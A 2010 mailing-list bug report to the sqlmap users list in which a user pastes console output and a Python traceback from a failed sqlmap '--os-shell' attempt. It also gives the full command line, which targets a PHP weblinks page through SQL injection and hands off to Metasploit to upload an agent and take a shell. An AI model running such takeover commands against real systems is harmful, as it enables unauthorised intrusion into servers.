[sqlmap-users] sqlmap error
Brought to you by:
inquisb
From: Ustupid M. <ust...@gm...> - 2010-05-31 03:33:46
|
which web application language does the web server support? [1] ASP (default) [2] PHP [3] JSP > 1 [23:34:10] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/Inetpub/wwwroot/]: C:/xampp/htdocs/modules/weblinks0/ [23:34:13] [INFO] retrieved web server full paths: '/modules/weblinks0/visit.php' please provide any additional web server full path to try to upload the agent [C:/Inetpub/wwwroot/]: [23:34:16] [WARNING] unable to upload the uploader agent on '/modules/weblinks0' [23:34:16] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.8 Python version: 2.6.5 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 77, in main start() File "/.rnd2/pa/sqlmap/lib/controller/controller.py", line 259, in start action() File "/.rnd2/pa/sqlmap/lib/controller/action.py", line 141, in action conf.dbmsHandler.osShell() File "/.rnd2/pa/sqlmap/plugins/generic/takeover.py", line 98, in osShell self.initEnv(web=web) File "/.rnd2/pa/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv self.webInit() File "/.rnd2/pa/sqlmap/lib/takeover/web.py", line 189, in webInit uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) File "/.rnd2/pa/sqlmap/lib/request/connect.py", line 126, in getPage conn = urllib2.urlopen(req) File "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "/usr/local/lib/python2.6/urllib2.py", line 391, in open response = self._open(req, data) File "/usr/local/lib/python2.6/urllib2.py", line 409, in _open '_open', req) File "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain result = func(*args) File "/usr/local/lib/python2.6/urllib2.py", line 1161, in http_open return self.do_open(httplib.HTTPConnection, req) File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open h = http_class(host, timeout=req.timeout) # will parse host:port File "/usr/local/lib/python2.6/httplib.py", line 657, in __init__ self._set_hostport(host, port) File "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '' [*] shutting down at: 23:34:16 ./sqlmap.py -u 'http://somehost/modules/weblinks0/visit.php?lid=44' --os-shell --msf-path /opt/metasploit3/msf3 |